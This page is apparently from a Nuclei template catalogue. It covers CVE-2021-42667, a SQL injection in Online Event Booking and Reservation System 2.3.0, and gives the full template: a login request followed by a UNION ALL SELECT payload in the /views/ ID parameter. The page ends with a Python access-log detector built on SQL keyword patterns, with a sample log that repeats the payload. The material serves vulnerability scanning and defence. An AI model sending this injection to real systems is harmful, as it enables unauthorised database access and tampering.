Online Event Booking and Reservation System 2.3.0 - SQL Injection
ID: CVE-2021-42667
Severity: critical
Author: fxploit
Tags: cve,cve2021,sqli,authenticated,online_event_booking_and_reservation_system_project
Description
Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
YAML Source
id: CVE-2021-42667

info:
  name: Online Event Booking and Reservation System 2.3.0 - SQL Injection
  author: fxploit
  severity: critical
  description: |
    Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update to a non-vulnerable version of the Online Event Booking and Reservation System.
  reference:
    - https://github.com/0xDeku/CVE-2021-42667
    - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
    - https://github.com/TheHackingRabbi/CVE-2021-42667
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42667
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42667
    cwe-id: CWE-89
    epss-score: 0.04318
    epss-percentile: 0.91499
    cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: online_event_booking_and_reservation_system_project
    product: online_event_booking_and_reservation_system
  tags: cve,cve2021,sqli,authenticated,online_event_booking_and_reservation_system_project

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&pwd={{password}}
      - |
        GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-42667.yaml"
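The template above probes /views/ with a UNION-based ID value; the request it sends is also the shape a defender wants to spot in web-server access logs. The following is an added detection example, not part of the Nuclei template or the vulnerable project: it decodes the ID parameter of GET /views/ requests and flags values that are not a plain integer. The log format and all sample lines are constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import urlparse, parse_qs, unquote_plus

# Request field of a combined-format access log: "GET /path?query HTTP/1.1".
# The log format is an assumption of this example, not something the page specifies.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Tokens that never belong in a numeric record id (matched on the decoded value).
SQLI_KEYWORDS = re.compile(r"\b(union|select|sleep|benchmark)\b|--|/\*", re.I)


def classify_request(target: str) -> Optional[str]:
    """Return a finding label for a request target, or None when it looks benign."""
    url = urlparse(target)
    if not url.path.startswith("/views/"):
        return None  # only the endpoint named in the advisory is in scope
    params = parse_qs(url.query, keep_blank_values=True)  # parse_qs percent-decodes once
    for raw_id in params.get("ID", []):
        decoded = unquote_plus(raw_id)  # second pass catches double-encoded values
        if decoded.isdigit():
            continue  # a bare integer is the expected shape of ID
        if SQLI_KEYWORDS.search(decoded):
            return "sqli-union"
        return "id-not-numeric"
    return None


def scan_log(lines):
    """Yield (line_no, label, decoded_target) for every suspicious GET request."""
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m or m["method"] != "GET":
            continue
        label = classify_request(m["target"])
        if label:
            yield n, label, unquote_plus(m["target"])


# Constructed sample log; line 2 mirrors the probe the template sends.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /views/?v=USER&ID=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5(999999999)%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /views/?v=USER&ID=1abc HTTP/1.1" 200 400',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for n, label, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: {label}: {target}")
```

Because the template only reports a hit when the response body echoes md5(num), a 200 response to such a request in your logs is worth correlating with the response size, which is why the sample keeps the byte count field.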